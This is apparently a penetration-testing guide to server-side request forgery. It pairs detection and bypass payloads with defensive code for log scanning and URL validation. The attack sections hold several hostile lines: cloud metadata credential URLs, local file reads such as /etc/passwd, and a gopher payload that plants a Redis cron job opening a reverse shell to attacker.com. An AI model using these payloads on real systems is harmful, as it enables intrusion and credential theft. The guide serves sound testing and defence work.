ssrf-testing

SSRF (Server-Side Request Forgery) Testing

Overview

SSRF (Server-Side Request Forgery) is a vulnerability in which an application can be made to issue requests from the server to attacker-chosen destinations, enabling access to internal network resources, port scanning, or firewall bypass. This skill covers methods for detecting, exploiting, and defending against SSRF vulnerabilities.

Vulnerability Principle

The application accepts a URL parameter and requests that URL. An attacker who controls the target of the request can achieve:
  • Access to internal network resources
  • Local file reading
  • Port scanning
  • Firewall bypass
  • Cloud service metadata access

Testing Methods

1. Identify SSRF Input Points

Common features that fetch a user-supplied URL:
  • URL preview/screenshot
  • File upload (remote URL)
  • Webhook callback
  • API proxy
  • Data import
  • Image processing
  • PDF generation

2. Basic Detection

Test local loopback:
```
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
```
Test internal network IPs:
```
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
```
Test the file protocol:
```
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
```

3. Bypass Techniques

IP address encoding:
```
127.0.0.1 → 2130706433 (decimal)
127.0.0.1 → 0x7f000001 (hexadecimal)
127.0.0.1 → 0177.0.0.1 (octal)
```
Domain resolution bypass (wildcard DNS services that resolve to the embedded address):
```
127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me
```
URL redirection (the validated URL redirects to an internal target):
```
http://attacker.com/redirect → http://127.0.0.1
```
Protocol/authority confusion (userinfo and fragment make the parser and the fetcher disagree about the host):
```
http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1
```

Exploitation Techniques

Internal Network Detection

Port scanning: use Burp Intruder to iterate over the target port.

**Service identification:**
- Response time differences
- Error messages
- HTTP status codes
- Response content

Cloud Service Metadata

AWS EC2:
```
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
Google Cloud:
```
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
```
Azure:
```
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01
```
Alibaba Cloud:
```
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/
```
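The metadata endpoints above are the destinations a defender most wants to see in outbound telemetry from any service that fetches user-supplied URLs. The following is an added example, not code from the original page: it parses a constructed log from a hypothetical URL-fetching service and flags fetches to the listed metadata hosts, or to IP literals that are not globally routable, including the decimal and hexadecimal encodings from the bypass section. The log format, hostnames, and client addresses are all constructed for the example.

```python
"""Flag server-side fetches aimed at cloud metadata endpoints or non-routable
addresses in an outbound-fetch log (added example, not the page's own code)."""
import ipaddress
import re
from collections import Counter
from urllib.parse import urlparse

# Metadata endpoints from the page: AWS and Azure IMDS, GCP, and Alibaba Cloud.
METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal", "100.100.100.200"}

# Constructed log lines in a hypothetical "url-fetcher" service format:
#   <timestamp> <requesting client> fetched <url> -> <status>
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.5 fetched https://cdn.example.com/img/1.png -> 200
2024-05-01T10:00:02Z 203.0.113.5 fetched http://169.254.169.254/latest/meta-data/ -> 200
2024-05-01T10:00:03Z 198.51.100.9 fetched http://metadata.google.internal/computeMetadata/v1/ -> 403
2024-05-01T10:00:04Z 203.0.113.5 fetched http://169.254.169.254/latest/meta-data/iam/security-credentials/ -> 200
2024-05-01T10:00:05Z 198.51.100.9 fetched http://2130706433/ -> 200
2024-05-01T10:00:06Z 203.0.113.5 fetched http://100.100.100.200/latest/meta-data/ram/security-credentials/ -> 200
2024-05-01T10:00:07Z 198.51.100.9 fetched https://example.com/feed.xml -> 200
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) fetched (?P<url>\S+) -> (?P<status>\d+)$")


def literal_ip(host):
    """Return an ip_address for a dotted, decimal (2130706433) or hex (0x7f000001)
    literal, else None. Decimal and hex are the encodings the page lists as bypasses."""
    if host is None:
        return None
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        # int(..., 0) accepts plain decimal and a 0x prefix; out-of-range or
        # non-numeric text raises ValueError (AddressValueError is a subclass).
        return ipaddress.IPv4Address(int(host, 0))
    except ValueError:
        return None


def classify(url):
    """Return a reason string if the destination is suspicious for a
    server-side fetcher, else None."""
    host = urlparse(url).hostname
    if host in METADATA_HOSTS:
        return "cloud-metadata-endpoint"
    ip = literal_ip(host)
    if ip is not None and not ip.is_global:
        return "non-global-literal-ip"
    return None


def scan_log(text):
    """Parse the log and return a list of (client, url, reason) alerts."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        reason = classify(m.group("url"))
        if reason:
            alerts.append((m.group("client"), m.group("url"), reason))
    return alerts


def alerts_by_client(alerts):
    """Count alerts per requesting client; one client repeatedly steering the
    fetcher at metadata paths is the pattern to escalate."""
    return Counter(client for client, _, _ in alerts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, url, reason in found:
        print(f"{reason:26} {client:14} {url}")
    print(alerts_by_client(found))
```

Matching on `hostname` rather than the raw URL string is what makes the check robust to path and query variation; the two things it deliberately does not do are resolve hostnames (a detection job should not generate DNS traffic of its own) and unwrap redirects, so a fetch of a public URL that redirected to the metadata service must be caught by logging the final destination, not the requested one.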

Internal Network Application Attacks

Access admin backends:
```
http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin
```
Unauthorized Redis access:
```
http://127.0.0.1:6379
```
then send Redis commands.

**FastCGI attack:**

Execute commands via the FastCGI protocol.

Advanced Exploitation

Gopher Protocol

Send arbitrary protocol data:
```
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a
```
Redis command execution:
```
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
```

Dict Protocol

Port scanning and information gathering:
```
dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status
```

File Protocol

Read local files:
```
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ
```

Tool Usage

SSRFmap

Basic scan:
```bash
python3 ssrfmap.py -r request.txt -p url
```
Port scan:
```bash
python3 ssrfmap.py -r request.txt -p url -m portscan
```
Cloud metadata:
```bash
python3 ssrfmap.py -r request.txt -p url -m cloud
```

Gopherus

Generate a Gopher payload:
```bash
python gopherus.py --exploit redis
```

Burp Collaborator

Detect blind SSRF by pointing the parameter at a Collaborator host:
```
http://burpcollaborator.net
```
and observing whether any DNS/HTTP interaction arrives.

Verification and Reporting

Verification Steps

  1. Confirm that the request target can be controlled
  2. Verify access to internal network resources or port scanning
  3. Assess the scope of impact (internal network penetration, data leakage, etc.)
  4. Record a complete PoC

Reporting Key Points

  • Vulnerability location and input parameter
  • Accessible internal network resources or ports
  • Complete exploitation steps and PoC
  • Fix recommendations (URL whitelist, disabling dangerous protocols, etc.)

Defense Measures

Recommended Solutions

  1. URL whitelist
     ```python
     from urllib.parse import urlparse

     ALLOWED_DOMAINS = ['example.com', 'cdn.example.com']

     # Compare the parsed hostname, not the raw netloc (which may carry
     # user:pass@ and :port), against an exact allowlist.
     parsed = urlparse(url)
     if parsed.hostname not in ALLOWED_DOMAINS:
         raise ValueError("Domain not allowed")
     ```
  2. Disable dangerous protocols
     • Only allow http/https
     • Block file://, gopher://, dict://, etc.
  3. IP address filtering
     ```python
     import ipaddress

     def is_internal_ip(ip):
         addr = ipaddress.ip_address(ip)
         # Private (RFC 1918), loopback and link-local (which includes the
         # 169.254.169.254 metadata address) are all internal for SSRF purposes.
         return addr.is_private or addr.is_loopback or addr.is_link_local
     ```
  4. Use DNS resolution verification
     • Resolve the domain name to its IP addresses
     • Verify that none of them fall within internal network ranges
  5. Network isolation
     • Restrict the server's outbound network access
     • Route outbound requests through a proxy server
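The five recommendations above only hold up when applied together, and the bypass techniques from the testing section are exactly the cases a validator must survive. The following is an added example, not code from the original page: one validator combining a scheme allowlist, a hostname allowlist, rejection of credentials in the URL authority, and a resolve-then-check step that rejects any resolved address that is not globally routable (loopback, RFC 1918, link-local including 169.254.169.254, CGNAT including 100.100.100.200, and IPv4-mapped IPv6 forms of the same). The resolver is injectable; `fake_resolver`, `FAKE_DNS` and the hostnames in it are constructed so the example runs offline, and the entries for `127.0.0.1.nip.io` and `2130706433` model, as an assumption, what a wildcard-DNS service and a glibc `getaddrinfo` that accepts decimal IPv4 would return.

```python
"""URL validator for a server-side fetcher (added example, not the page's code)."""
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_DOMAINS = {"example.com", "cdn.example.com"}  # same allowlist as above


class UnsafeURL(ValueError):
    """Raised when a URL fails any SSRF check."""


def system_resolver(host):
    """Every A/AAAA answer for host from the OS resolver."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed answers (hypothetical names) so the example runs without network.
FAKE_DNS = {
    "cdn.example.com": {"93.184.216.34"},
    "127.0.0.1.nip.io": {"127.0.0.1"},           # wildcard DNS echoing the embedded IP
    "2130706433": {"127.0.0.1"},                 # decimal IPv4 accepted by glibc getaddrinfo
    "internal.corp.example": {"10.0.0.5"},
    "dual.example.com": {"93.184.216.34", "::ffff:169.254.169.254"},
}


def fake_resolver(host):
    return set(FAKE_DNS.get(host, ()))


def is_blocked_address(text):
    """True for anything not globally routable: loopback, RFC 1918, link-local
    (169.254.169.254), CGNAT (100.64.0.0/10, home of 100.100.100.200), reserved
    ranges, and IPv4-mapped IPv6 disguises of the same."""
    addr = ipaddress.ip_address(text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not addr.is_global


def _check(url, resolver, allowed_domains):
    """Return (reason, host, sorted_addresses); reason is None when the URL passes."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return f"scheme not allowed: {parsed.scheme!r}", None, None
    # http://127.0.0.1:80@evil.com parses as user "127.0.0.1", password "80";
    # refusing userinfo outright removes the whole parser/fetcher disagreement.
    if parsed.username is not None or parsed.password is not None:
        return "credentials in authority not allowed", None, None
    host = parsed.hostname  # normalised, without port or userinfo; fragment is ignored
    if not host:
        return "missing hostname", None, None
    if allowed_domains is not None and host not in allowed_domains:
        return f"host not in allowlist: {host!r}", None, None
    try:
        addresses = {str(ipaddress.ip_address(host))}  # IP literal: nothing to resolve
    except ValueError:
        addresses = set(resolver(host))
    if not addresses:
        return f"hostname did not resolve: {host!r}", None, None
    # Every answer must be acceptable; a mixed public/private answer set is a
    # classic way to slip past a check that only inspects the first record.
    for a in sorted(addresses):
        if is_blocked_address(a):
            return f"{host} resolves to non-global address {a}", None, None
    return None, host, sorted(addresses)


def why_rejected(url, resolver=system_resolver, allowed_domains=ALLOWED_DOMAINS):
    """None if the URL may be fetched, otherwise the reason it was rejected.
    allowed_domains=None disables the allowlist (e.g. user-supplied webhooks)
    and relies on the resolution check alone."""
    return _check(url, resolver, allowed_domains)[0]


def resolved_target(url, resolver=system_resolver, allowed_domains=ALLOWED_DOMAINS):
    """(host, ip) the fetcher should connect to. The caller pins the connection
    to this ip and sends Host: host, so the address checked is the address used."""
    reason, host, addresses = _check(url, resolver, allowed_domains)
    if reason:
        raise UnsafeURL(reason)
    return host, addresses[0]


if __name__ == "__main__":
    for candidate in ["https://cdn.example.com/a.png", "http://127.0.0.1:80@evil.com",
                      "http://evil.com#@127.0.0.1", "file:///etc/passwd"]:
        print(candidate, "->", why_rejected(candidate, resolver=fake_resolver) or "ok")
```

Two operational points follow from the design: the fetcher must not auto-follow redirects but re-run `_check` on every hop (the `attacker.com/redirect → 127.0.0.1` case from the bypass section), and it must connect to the address returned by `resolved_target` rather than resolving the name a second time, otherwise a DNS answer that changes between check and fetch (rebinding) defeats the whole validation.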

Notes

  • Only perform tests in authorized environments
  • Avoid impacting internal network systems
  • Note which protocols the target's HTTP client library actually supports
  • Pay attention to request frequency during testing to avoid triggering defenses